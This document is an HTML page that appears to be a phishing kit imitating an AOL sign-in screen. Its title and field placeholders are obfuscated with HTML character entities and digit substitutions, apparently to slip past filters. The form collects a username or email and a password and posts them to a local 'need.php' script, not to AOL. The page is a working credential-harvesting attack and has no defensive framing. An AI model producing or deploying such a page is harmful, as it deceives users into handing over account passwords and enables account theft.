
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>AO&#76;&#32;&#83;&#49;GN &#49;N.</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
input.pw { -webkit-text-security: disc; }
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:40px;top:32px;width:318px;height:483px;text-align:left;z-index:3;">
<img src="images/wal.png" id="Image1" alt="" style="width:318px;height:483px;" align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:570px;z-index:4">
<form name="Form1" method="post" id="demo-form" action="need.php">

<input id="email" style="position:absolute;left:71px;top:112px;width:252px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="em" value="" type="text" required placeholder="U&#115;&#101;&#114;&#110;&#97;&#109;e &#111;&#114; E&#109;&#97;&#105;l ">

<input  style="position:absolute;left:71px;top:159px;width:252px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" class="pw" name="ps" value=""  type="password" required placeholder="P&#97;&#115;&#115;&#119;&#111;&#114;d ">

<input id="Button1" name="Button1" value="" style="position:absolute;left:71px;top:266px;width:252px;height:42px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form></div>

</body></html>